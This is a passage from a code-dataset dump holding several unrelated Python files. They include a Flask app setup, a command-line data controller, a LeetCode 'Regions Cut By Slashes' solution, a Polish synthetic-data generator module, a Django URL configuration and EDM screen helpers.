file_reader:\n\t\t\t\t\t\t\tmovs[i][j][k].extend(line)\n\t\t\t\tos.chdir(timedir)\n\n\t\t\tos.chdir(datedir)\n\n\t\tos.chdir(moviedir)\n\n\tos.chdir(curdir)\n\n\treturn movs\n","sub_path":"dir.py","file_name":"dir.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"169053335","text":"from flask import Flask\nfrom models import db\nfrom config import DATABASE_CONNECTION_URI\n\ndef create_app():\n flask_app = Flask(__name__) # creating flask app\n flask_app.config['SQLALCHEMY_DATABASE_URI'] = DATABASE_CONNECTION_URI\n # assigning URI to this app, which is used to connect to 
postgres db\n flask_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n # needs to be set to True of False, else error. True will track modifications & take up more memory \n flask_app.app_context().push() # since Flask can have multiple apps we have to specify which app we are using with SQLAlchemy, hence we push the context with our newly created app. \n # adding context to future calls made with this app (line 11) flask.current_app=the application handling the current request\n db.init_app(flask_app) # linking db to flask app\n# db.drop_all() # deletes all databases so we start with an empty database\n db.create_all() # creating table(s) in database, using models.py\n return flask_app # adding context to future calls made with this app (line 11) flask.current_app=the application handling the current request\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"74965513","text":"import cmd_view\nfrom validate import Check\nimport graph\nimport pickle\nfrom pickle_view import testing_pickle\nimport sys\nimport datetime\nfrom entered_file_view import EnteredFile\nfrom database_view import Database\nfrom display_methods import Display as Dm\n\n\nclass Controller:\n def __init__(self, view):\n self.__entered_file = EnteredFile()\n self.__validated_data = []\n self.__check_input = Check()\n self.__stored_data = \"Data not stored\"\n self.__db = Database()\n self.__cmd_view = view\n self.__loaded_input = \"Data not loaded\"\n\n def go(self, controller):\n self.__cmd_view.set_controller(controller)\n self.__cmd_view.cmdloop()\n\n def database(self, line):\n self.__db.create_database()\n self.__loaded_input = self.__db.get_posts()\n print(\"Your data has been added to the database\")\n\n def load(self, location):\n try:\n directory = location\n self.__entered_file.get_input(directory)\n self.__loaded_input = []\n self.__loaded_input = self.__entered_file.get_data()\n print(\"Loaded from file\")\n except FileNotFoundError:\n print(\"Please select valid file location!\")\n\n def validate(self, line):\n if self.__loaded_input != \"Data not loaded\":\n self.__validated_data =\\\n self.__check_input.check_data(self.__loaded_input)\n print(\"Entry data is checked\")\n else:\n print(\"Please load data before validating\")\n\n def save(self, line):\n if len(line) == 0:\n if self.__loaded_input == \"Data not loaded\":\n print(\"\\nData needs to be loaded before saving\")\n if not self.__validated_data:\n print(\"No data has been validated.\\nPlease \"\n \"validate data before saving\")\n elif self.__validated_data[0]:\n self.__stored_data = []\n print(\"The following data has been saved\")\n for row in range(1, len(self.__validated_data)):\n self.__stored_data.append(self.__validated_data[row])\n else:\n print(\"Please do not enter any extra input after 'save'\")\n\n def display(self, format):\n display_type = Dm.get_display_type(format)\n calculator = Dm.builder(\n display_type, self.__loaded_input, self.__stored_data)\n return calculator.calculate_displaying()\n\n def graph(self, line):\n if not isinstance(self.__stored_data, str):\n graph.do_display_graph(self.__stored_data)\n\n def pickle(self, user_input):\n user_input = user_input.split(\" \")\n if user_input[0] == 'save':\n if self.__stored_data != \"Data not stored\":\n if user_input[1]:\n testing_pickle(self.__stored_data, user_input[1])\n else:\n print(\"No data loaded and validated\")\n elif user_input[0] 
== 'load':\n with open(user_input[1] + '.pickle', 'rb') as file:\n self.__loaded_input = pickle.load(file)\n print(\"The pickle content follows\")\n for row in range(len(self.__loaded_input)):\n print(self.__loaded_input[row])\n else:\n print(\"please enter and type of pickle (load or save) \"\n \"and the location or name\")\n\n @staticmethod\n def opening(line):\n time_now = datetime.date.today()\n if len(sys.argv) > 1:\n sys.argv[1] = line\n if sys.argv[1] == \"welcome\":\n print(\"Hello and this is Josh's program and it is \" +\n str(time_now))\n else:\n print(\"The time is \" + str(time_now) +\n \". Argument not accepted\")\n\nif __name__ == \"__main__\":\n control = Controller(cmd_view.CmdView())\n Controller.opening(\"\")\n control.go(control)\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"179952073","text":"\"\"\"\n959. Regions Cut By Slashes\nIn a N x N grid composed of 1 x 1 squares, each 1 x 1 square consists of a /, \\, or blank space. These characters divide the square into contiguous regions.\n\n(Note that backslash characters are escaped, so a \\ is represented as \"\\\\\".)\n\nReturn the number of regions.\n\n \n\nExample 1:\n\nInput:\n[\n \" /\",\n \"/ \"\n]\nOutput: 2\n\"\"\"\n# this is a problem to find number of connected components\n# either use union find or dfs\n# dfs\n# very annoying to analyze all possible outcomes\n# time complexity -- O(N*M)\n# Runtime: 156 ms, faster than 88.22% of Python3 online submissions for Regions Cut By Slashes.\n# Memory Usage: 13.3 MB, less than 100.00% of Python3 online submissions for Regions Cut By Slashes.\nclass Solution:\n def regionsBySlashes(self, grid: List[str]) -> int:\n n_row, n_col = len(grid), len(grid[0])\n node = {(0, 1):False, (0, -1): False, (1, 0):False, (-1, 0):False}\n self.graph = [[node.copy() for _ in range(n_col)] for _ in range(n_row)]\n self.direct_loc = {(0, 1):(-1, 0), (1, 0):(0, 1), \n (-1, 0):(0, -1), (0, -1):(1, 0)}\n num_area = 0\n for i in range(n_row):\n for j in range(n_col):\n for key in self.graph[i][j].keys():\n if self.graph[i][j][key]:\n continue \n # print(i, j, key)\n self.dfs(i, j, key, grid)\n num_area += 1\n return num_area\n \n def dfs(self, x, y, loc, grid):\n n_row, n_col = len(grid), len(grid[0])\n if self.graph[x][y][loc]:\n return \n \n self.graph[x][y][loc] = True\n if grid[x][y] == \"/\":\n if loc == (-1, 0):\n self.graph[x][y][(0, 1)] = True\n new_directions = [[-1, 0], [0, -1]]\n elif loc == (0, 1):\n self.graph[x][y][(-1, 0)] = True\n new_directions = [[-1, 0], [0, -1]]\n elif loc == (1, 0):\n self.graph[x][y][(0, -1)] = True\n new_directions = [[1, 0], [0, 1]]\n elif loc == (0, -1):\n self.graph[x][y][(1, 0)] = True\n new_directions = [[1, 0], [0, 1]]\n elif grid[x][y] == \"\\\\\":\n if loc == (-1, 0):\n self.graph[x][y][(0, -1)] = True\n new_directions = [[0, -1], [1, 0]]\n elif loc == (0, -1):\n self.graph[x][y][(-1, 0)] = True\n new_directions = [[0, -1], [1, 0]]\n elif loc == (1, 0):\n self.graph[x][y][(0, 1)] = True\n new_directions = [[0, 1], [-1, 0]]\n elif loc == (0, 1):\n self.graph[x][y][(1, 0)] = True\n new_directions = [[0, 1], [-1, 0]]\n elif grid[x][y] == \" \":\n for key in self.graph[x][y].keys():\n self.graph[x][y][key] = True\n new_directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n \n for dx, dy in new_directions:\n new_x, new_y = x + dx, y + dy\n if new_x < 0 or new_x >= n_row or new_y < 0 or new_y >= 
n_col:\n continue\n new_loc = self.direct_loc[(dx, dy)]\n self.dfs(new_x, new_y, new_loc, grid)\n ","sub_path":"Widen/LC959_Regions_Cut_By_Slashes.py","file_name":"LC959_Regions_Cut_By_Slashes.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"366257324","text":"\"\"\" Podstawowe funkcje do generatorów. Ułatwiają generowanie danych do wielu zbiorów jednocześnie, wraz z zależnościami między nimi.\nGeneratory tworzone przy pomocy poniższych funkcji powinny bazować na wykorzystaniu list. Każdą kolumnę tworzy się\npoprzez stworzenie oddzielnej listy, zależności między kolumnami tworzy się, gederując dane do nowej kolumny iterując\npo kolumnie już istniejącej. Kolumny można również importować z plików CSV, tworząc z nich maciecierz, a następnie pobierać z macierzy\n wybrane kolumny. Po skompletowaniu wszystkich kolumn, trzeba połączyć kolumny w zbiory przy pomocy funkcji list(zip(kolumny*)), a\n następnie powstałe macierze wyeksportować przy pomocy odpowiedniej funkcji do pliku CSV\"\"\"\n\ndef z_pliku_do_macierzy(nazwa_pliku):\n \"\"\" funkcja pobiera wiersze z wybranego pliku csv, i zamienia je w krotki, które są elementami listy wyjściowej (macierzy)\n wszystkie elementy macierzy są stringami\"\"\"\n print(\"Wczytywanie pliku %s.csv...\" % nazwa_pliku)\n plik = open(\"%s.csv\" % nazwa_pliku,\"r\")\n macierz = []\n for linia in plik:\n lista = linia.replace(\"\\n\",\"\").split(\";\")\n krotka = tuple(lista)\n macierz.append(krotka)\n plik.close()\n return macierz\n del macierz\n del lista\n del krotka\n\ndef kolumna_z_macierzy(macierz, nazwa_kolumny):\n \"\"\"Funkcja pobiera z danej macierzy kolumnę o podanej nazwie. Pierwszym parametrem jest zmienna z macierzą,\n drugim - string z dokładną nazwą kolumny. Powstała lista (kolumna) nie zawiera nagłówka\"\"\"\n nagłówki = macierz[0]\n for nazwa in nagłówki:\n if nazwa == nazwa_kolumny:\n indeks_kolumny = nagłówki.index(str(nazwa))\n print(\"Ekstrakcja kolumny %s...\" % nazwa_kolumny)\n break\n else:\n pass\n else:\n print(\"Nie ma takiej kolumny\")\n nagłówki = 1\n kolumna = []\n for krotka in macierz:\n if krotka[indeks_kolumny].isdigit():\n x = int(krotka[indeks_kolumny])\n else:\n x = krotka[indeks_kolumny]\n if nagłówki == 1:\n nagłówki += 1\n else:\n kolumna.append(x)\n return kolumna\n del nagłówki\n del kolumna\n del x\n\n\ndef kolumna_z_macierzy_bez_nazwy(macierz, indeks_kolumny):\n \"\"\" Funkcja umożliwia pobieranie kolumn z macierzy bez nagłówków. Pierwszym parametrem jest zmienna z macierzą,\n drugim indeks kolumny (czyli indeks elementów krotek, reprezentujących wiersze macierzy)\"\"\"\n kolumna = []\n for krotka in macierz:\n if krotka[indeks_kolumny].isdigit():\n x = int(krotka[indeks_kolumny])\n else:\n x = krotka[indeks_kolumny]\n kolumna.append(x)\n return kolumna\n del kolumna\n\n\n\ndef z_macierzy_do_pliku_z_nagłówkami(macierz,nazwa_pliku, *nazwy_kolumn):\n \"\"\" Zapisuje wskazaną macierz w pliku o wybranej nazwie i z wybranymi nazwami kolum. Nazwy pliku i kolumn muszą być\n stringami\"\"\"\n print(\"Zapisywanie do pliku %s.csv...\" % nazwa_pliku )\n d = open(\"%s.csv\" % nazwa_pliku, \"w\")\n d.write(\";\".join(nazwy_kolumn))\n d.write(\"\\n\")\n for krotka in macierz:\n lista = []\n for element in krotka:\n lista.append(str(element))\n d.write(\";\".join(lista))\n d.write(\"\\n\")\n d.close()\n\n\ndef z_macierzy_do_pliku(macierz,nazwa_pliku):\n \"\"\"funkcja zapisuje do pliku csv macierz, dzieląc kolumny średnikami. 
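The LC959 record above notes that union find is the alternative to DFS but implements only the DFS; below is a minimal union-find sketch of the same counting idea, a common technique offered for illustration rather than the author's code. Each cell is split into four triangles (0=top, 1=right, 2=bottom, 3=left); the slash character decides which triangles merge within a cell, and adjacent cells always merge across their shared border.

def regions_by_slashes_uf(grid):
    # Union-find over 4 triangles per cell; region count = number of roots.
    n = len(grid)
    parent = list(range(4 * n * n))

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    for r in range(n):
        for c in range(n):
            base = 4 * (r * n + c)
            ch = grid[r][c]
            if ch == '/':
                union(base + 0, base + 3)  # top joins left
                union(base + 1, base + 2)  # right joins bottom
            elif ch == '\\':
                union(base + 0, base + 1)  # top joins right
                union(base + 2, base + 3)  # bottom joins left
            else:
                union(base + 0, base + 1)  # blank cell: all four merge
                union(base + 1, base + 2)
                union(base + 2, base + 3)
            if c + 1 < n:
                union(base + 1, 4 * (r * n + c + 1) + 3)  # right border
            if r + 1 < n:
                union(base + 2, 4 * ((r + 1) * n + c) + 0)  # bottom border
    return sum(find(x) == x for x in range(4 * n * n))

# regions_by_slashes_uf([' /', '/ ']) -> 2, matching the DFS answer above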
Powstały plik nie zawiera nagłówków\"\"\"\n print(\"Zapisywanie do pliku %s.csv...\" % nazwa_pliku)\n d = open(\"%s.csv\" % nazwa_pliku, \"w\")\n for krotka in macierz:\n lista = []\n for element in krotka:\n lista.append(str(element))\n d.write(\";\".join(lista))\n d.write(\"\\n\")\n d.close()\n del lista\n\n#li to lista, funkcja tworzy na jej podstawie nową listę, ale bez powtarzających się elementów.\n\n\ndef distinct(li):\n \"\"\"Funkcja na podstawie podanej listy tworzy listę bez powtarzających się elementów\"\"\"\n li2 = []\n for i in li:\n if i not in li2:\n li2.append(i)\n return li2\n del li2\n\n\n\ndef losowanie_z_listy(lista_wejściowa, długość):\n \"\"\"funkcja zwraca listę określonej długości z losowymi elementami z listy wejściowej\"\"\"\n from random import randint\n lista_2 = []\n for i in range(długość):\n a = lista_wejściowa[randint(0,len(lista_wejściowa)-1)]\n lista_2.append(a)\n return lista_2\n del lista_2\n\n#funkcja na podstawie listy wartości niestandaryzowanych\ndef standaryzacja_0_1(lista_do_standaryzacj):\n \"\"\"Funkcja standaryzuje elementy listy, zwracając listę z liczbami z przedziału od 0-1\"\"\"\n lista_zestandaryzowana = []\n for x in lista_do_standaryzacj:\n y = (x - min(lista_do_standaryzacj))/(max(lista_do_standaryzacj) - min(lista_do_standaryzacj))\n lista_zestandaryzowana.append(y)\n return lista_zestandaryzowana\n del lista_zestandaryzowana\n\n\ndef standaryzacja_min_1(lista_do_standaryzacj):\n \"\"\"Funkcja tworzy listę zestandaryzowaną, w której największemu elementowi odpowiada 1, a najmniejszemu jego wartość\n podzielona przez wartość elementu maksymalnego\"\"\"\n lista_zestandaryzowana = []\n for x in lista_do_standaryzacj:\n y = (x)/(max(lista_do_standaryzacj))\n lista_zestandaryzowana.append(y)\n return lista_zestandaryzowana\n\n# standaryzacja pozwalająca na losowanie przy pomocy p = random.random(). metoda = if p < waga_następnego_obiektu\ndef standaryzacja_do_losowania(lista_do_standaryzacj):\n \"\"\" Lista tworzy dystrybuantę z wartości listy. Przydatna przy tworzeniu wag elementów na podstawie pewnych, związanych\n z nimi wartości, i pozwala na losowanie z zastosowaniem wag przy pomocy funkcji random(). 
Metoda:\n if random() <= pierwszy argument dystrybuanty\n elif random() <= drugi argument dystrybuanty\n ...\"\"\"\n lista_zestandaryzowana = []\n print(lista_do_standaryzacj)\n poprzedni_y = 0\n for x in lista_do_standaryzacj:\n y = (x)/(sum(lista_do_standaryzacj))\n y = y + poprzedni_y\n lista_zestandaryzowana.append(y)\n poprzedni_y = y\n return lista_zestandaryzowana\n\n\n\n\ndef generator_imion_nazwisk(odsetek_mężczyzn_float, ilość, unikalność_kombinacji_T_N = \"N\"):\n \"\"\"generator zwraca unikalne kombinacje imiona i nazwiska obu płci,\n w zależności od ustalonego odsetka płci, w ustalonej ilości, z opcją zachowania unikalności kombinacji.\n wymaga plików csv Imiona męskie, Imiona żeńskie, Nazwiska męskie, Nazwiska żeńskie (trzeba podać ścieżki)\"\"\"\n\n from random import random\n from random import randint\n from Moje_biblioteki import Gen\n macierz = []\n M_imiona_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Imiona męskie\")\n M_nazwiska_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Nazwiska męskie\")\n Imię_męskie = Gen.kolumna_z_macierzy(M_imiona_męskie, \"Imię\")\n Nazwisko_męskie = Gen.kolumna_z_macierzy(M_nazwiska_męskie, \"Nazwisko\")\n\n M_imiona_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Imiona żeńskie\")\n M_nazwiska_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\Magda\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Nazwiska żeńskie\")\n Imię_żeńskie = Gen.kolumna_z_macierzy(M_imiona_żeńskie, \"Imię\")\n Nazwisko_żeńskie = Gen.kolumna_z_macierzy(M_nazwiska_żeńskie, \"Nazwisko\")\n macierz_unikalnych_rekordów = []\n if unikalność_kombinacji_T_N == \"T\":\n while len(macierz_unikalnych_rekordów) < ilość:\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n macierz_unikalnych_rekordów = Gen.distinct(macierz)\n return macierz_unikalnych_rekordów\n elif unikalność_kombinacji_T_N == \"N\":\n for i in range(ilość):\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n return macierz\n else:\n print(\"Wpisz 'T' lub 'N' w pozycji 'unikalność kombinacji\")\n print(\"Nie wygenerowano imion\")\n del macierz\n del M_imiona_męskie\n del M_nazwiska_męskie\n del M_imiona_żeńskie\n del M_nazwiska_żeńskie\n del Imię_męskie\n del Imię_żeńskie\n del Nazwisko_żeńskie\n del Nazwisko_męskie\n del macierz_unikalnych_rekordów\n\n\ndef generator_imion_nazwisk_amerykanskich(odsetek_mężczyzn_float, ilość, unikalność_kombinacji_T_N = \"N\"):\n \"\"\"generator zwraca unikalne kombinacje imiona i nazwiska obu płci,\n w zależności od ustalonego odsetka płci, w ustalonej ilości, z opcją zachowania unikalności kombinacji.\n wymaga plików csv Imiona męskie, Imiona żeńskie, Nazwiska męskie, Nazwiska żeńskie 
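standaryzacja_do_losowania above turns a weight list into a cumulative distribution so that a single random() draw selects an item; the if/elif chain its docstring describes can equivalently be replaced by a bisect lookup. A sketch (the bisect variant is an alternative, not what this module does, and weighted_choice is a hypothetical name):

# Draw against the cumulative list produced by standaryzacja_do_losowania:
# pick the first index whose cumulative value is >= random().
from bisect import bisect_left
from random import random

def weighted_choice(items, cumulative):
    return items[bisect_left(cumulative, random())]

# weights [1, 3] give the cumulative list [0.25, 1.0];
# weighted_choice(['a', 'b'], [0.25, 1.0]) yields 'b' about 3 times in 4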
(trzeba podać ścieżki)\"\"\"\n\n from random import random\n from random import randint\n from Moje_biblioteki import Gen\n macierz = []\n M_imiona_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie imiona meskie\")\n M_nazwiska_męskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie nazwiska meskie\")\n Imię_męskie = Gen.kolumna_z_macierzy(M_imiona_męskie, \"GivenName\")\n Nazwisko_męskie = Gen.kolumna_z_macierzy(M_nazwiska_męskie, \"Surname\")\n\n M_imiona_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie imiona zenskie\")\n M_nazwiska_żeńskie = Gen.z_pliku_do_macierzy(\"C:\\\\Users\\\\neo\\\\PycharmProjects\\\\Bazy danych do generowania\\\\Amerykanskie nazwiska zenskie\")\n Imię_żeńskie = Gen.kolumna_z_macierzy(M_imiona_żeńskie, \"GivenName\")\n Nazwisko_żeńskie = Gen.kolumna_z_macierzy(M_nazwiska_żeńskie, \"Surname\")\n macierz_unikalnych_rekordów = []\n if unikalność_kombinacji_T_N == \"T\":\n while len(macierz_unikalnych_rekordów) < ilość:\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n macierz_unikalnych_rekordów = Gen.distinct(macierz)\n return macierz_unikalnych_rekordów\n elif unikalność_kombinacji_T_N == \"N\":\n for i in range(ilość):\n p1 = random()\n if p1 <= odsetek_mężczyzn_float:\n wybrane_imię = Imię_męskie[randint(0, len(Imię_męskie) - 1)]\n wybrane_nazwisko = Nazwisko_męskie[randint(0, len(Nazwisko_męskie) - 1)]\n else:\n wybrane_imię = Imię_żeńskie[randint(0, len(Imię_żeńskie) - 1)]\n wybrane_nazwisko = Nazwisko_żeńskie[randint(0, len(Nazwisko_żeńskie) - 1)]\n krotka = (wybrane_imię, wybrane_nazwisko)\n macierz.append(krotka)\n return macierz\n else:\n print(\"Wpisz 'T' lub 'N' w pozycji 'unikalność kombinacji\")\n print(\"Nie wygenerowano imion\")\n del macierz\n del M_imiona_męskie\n del M_nazwiska_męskie\n del M_imiona_żeńskie\n del M_nazwiska_żeńskie\n del Imię_męskie\n del Imię_żeńskie\n del Nazwisko_żeńskie\n del Nazwisko_męskie\n del macierz_unikalnych_rekordów\n\n\n\ndef generator_id(ilość):\n \"\"\"generator danej ilości id, zwraca listę\"\"\"\n lista = []\n x = 1\n for i in range(ilość):\n lista.append(x)\n x += 1\n return lista\n del lista\n\ndef losowe_daty_w_przedziale(data_początkowa_str,data_końcowa_str,ilość):\n \"\"\"funkcja zwraca zadaną ilość losowych dat z danego przedziału w liście. 
w formacie \"%d-%m-%Y\"\"\"\n import datetime\n import time\n from random import random\n data1 = datetime.datetime.strptime(data_początkowa_str,\"%d-%m-%Y\")\n data2 = datetime.datetime.strptime(data_końcowa_str,\"%d-%m-%Y\")\n data3 = data2 - data1\n lista_dat = []\n for i in range(ilość):\n data4 = data3 * random()\n data5 = datetime.datetime.strftime(data4 + data1, \"%d-%m-%Y\")\n lista_dat.append(data5)\n return lista_dat\n del lista_dat\n\ndef poj_losowa_data_z_przedziału(data_początkowa_str,data_końcowa_str):\n \"\"\"generuje pojedynczą datę z przedziału\"\"\"\n import datetime\n import time\n from random import random\n data1 = datetime.datetime.strptime(data_początkowa_str,\"%d-%m-%Y\")\n data2 = datetime.datetime.strptime(data_końcowa_str,\"%d-%m-%Y\")\n data3 = data2 - data1\n data4 = data3 * random()\n data5 = datetime.datetime.strftime(data4 + data1, \"%d-%m-%Y\")\n return data5\n\ndef zmiana_dat_z_listy(lista, days,weeks ):\n \"\"\"funkcja zmienia daty z podanej listy o podaną ilość dni i tygodni i zwraca w liście\"\"\"\n import datetime\n lista_dat = []\n for data in lista:\n data1 = datetime.datetime.strptime(data,\"%d-%m-%Y\")\n data2 = data1 + datetime.timedelta(days, 0, 0, 0, 0, 0, weeks)\n data3 = datetime.datetime.strftime(data2, \"%d-%m-%Y\")\n lista_dat.append(data3)\n return lista_dat\n del lista_dat\n\ndef zmiana_pojedynczej_daty(data, days, weeks):\n import datetime\n data1 = datetime.datetime.strptime(data,\"%d-%m-%Y\")\n data2 = data1 + datetime.timedelta(days, 0, 0, 0, 0, 0, weeks)\n data3 = datetime.datetime.strftime(data2, \"%d-%m-%Y\")\n return data3\n\ndef elementy_list_w_stringi(lista):\n \"\"\"zmienia wszystkie elementy listy w stringi\"\"\"\n lista_ze_str = []\n for i in lista:\n lista_ze_str.append(str(i))\n return lista_ze_str\n del lista_ze_str\n\ndef dodaj_kolumnę_do_macierzy(macierz, kolumna, macierz_z_nagłówkami_T_N = \"N\", nazwa_kolumny = \"Nowa Kolumna\"):\n \"\"\"Funkcja dodaje nową kolumnę do istniejącej macierzy\"\"\"\n macierz_wyjściowa = []\n print(\"Dodawanie kolumny %s...\" % nazwa_kolumny)\n if macierz_z_nagłówkami_T_N == \"T\":\n nagłówek = list(macierz[0])\n nagłówek.append(nazwa_kolumny)\n nagłówek = tuple(nagłówek)\n macierz_wyjściowa.append(nagłówek)\n for index in range(1, len(macierz)):\n wiersz = list(macierz[index])\n wiersz.append(kolumna[index - 1])\n wiersz = tuple(wiersz)\n macierz_wyjściowa.append(wiersz)\n else:\n for index in range(0, len(macierz)):\n wiersz = list(macierz[index])\n wiersz.append(kolumna[index])\n wiersz = tuple(wiersz)\n macierz_wyjściowa.append(wiersz)\n return macierz_wyjściowa\n\ndef sprawdzanie_liczności_kolumn(nazwa_zbioru, *kolumny):\n \"\"\"Funkcja sprawdza liczność wybranych kolumn. 
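The date helpers above all share one trick: scale the timedelta between the two endpoint dates by random() and add it back onto the start date, which gives a uniformly distributed date in the range. A self-contained restatement with English names and the same "%d-%m-%Y" format (illustrative only, not part of Gen):

import datetime
from random import random

def random_date_between(start_str, end_str, fmt='%d-%m-%Y'):
    # (end - start) * random() is a uniform offset into the interval
    start = datetime.datetime.strptime(start_str, fmt)
    end = datetime.datetime.strptime(end_str, fmt)
    return (start + (end - start) * random()).strftime(fmt)

# random_date_between('01-01-2020', '31-12-2020') -> e.g. '17-06-2020'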
Dla orientacji można nazwać kolumny\"\"\"\n print(\"%s:\" % nazwa_zbioru)\n lista_kolumn = kolumny\n x=1\n for i in lista_kolumn:\n print(\"kolumna%s:\" % x, len(i))\n x +=1\n print(\"\\n\")\n\ndef losowa_godzina_w_przedziale(godzina_min, godzina_max):\n from random import randint\n h = randint(godzina_min, godzina_max)\n if h < 10:\n h = \"0%s\" % h\n else:\n h = str(h)\n m = randint(1, 59)\n if m < 10:\n m = \"0%s\" % m\n else:\n m = str(m)\n s = randint(1,59)\n if s < 10:\n s = \"0%s\" % s\n else:\n s = str(s)\n godzina = \"%s:%s:%s\" %(h,m,s)\n return godzina","sub_path":"Gen.py","file_name":"Gen.py","file_ext":"py","file_size_in_byte":16523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"341070141","text":"from django.contrib import admin\nfrom django.urls import include, path\n\nfrom .views import home\nadmin.autodiscover()\n\nurlpatterns = [\n path('', home, name='home'),\n\n # url(r'^demoproject/', include('demoproject.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n path('admin_tools_stats/', include('admin_tools_stats.urls')),\n path('admin_tools/', include('admin_tools.urls')),\n path('admin/', admin.site.urls),\n]\n","sub_path":"demoproject/demoproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"212559501","text":"\"Module containing some useful EdmObjects for building dls screens\"\n\nfrom edmObject import *\n__all__=['arrow', 'dummy', 'embed', 'exit_button', 'label',\\\n 'raised_PV_button_circle', 'raised_PV_circle', \\\n 'raised_button_circle', 'raised_circle', 'raised_text_button_circle',\\\n 'raised_text_circle', 'rd', 'rd_visible', 'rectangle', 'symbol',\\\n 'text_monitor', 'tooltip', 'shell', 'shell_visible', 'can_optimise']\n__all__.sort()\n\ndef can_optimise(x):\n \"\"\"can_optimise(x) -> Boolean\n Return True if the item can be optimised (i.e. if it is an autogen screen\n or one of the selected optimisable screens\"\"\"\n return (\"camera\" in x and not \"2cam\" in x and not \"camera\"==x) or \"autogen\"\\\n in x or \"slit\" in x or \"mirror\" in x \n \ndef label(x,y,w,h,text,fontAlign=\"left\"):\n \"\"\"label(x,y,w,h,text,fontAlign=\"left\") -> EdmObject\n Return a Static Text box with position (x,y) dimensions (w,h). text is the\n display text and fontAlign is how it is aligned. Font is arial medium 10\"\"\"\n ob = EdmObject(\"Static Text\")\n ob.setDimensions(w,h)\n ob.setPosition(x,y)\n ob[\"font\"]=quoteString(\"arial-medium-r-10.0\")\n ob[\"fgColor\"]=ob.Colour[\"Black\"]\n ob[\"useDisplayBg\"] = True\n ob[\"value\"] = quoteListString(text) \n ob[\"fontAlign\"] = quoteString(fontAlign) \n return ob\n\ndef text_monitor(x,y,w,h,pv,showUnits=False,fontAlign=\"left\"):\n \"\"\"text_monitor(x,y,w,h,pv,showUnits=False,fontAlign=\"left\") -> EdmObject\n Return a Text Monitor with position (x,y) dimensions (w,h). pv is the\n display pv and fontAlign is how it is aligned. 
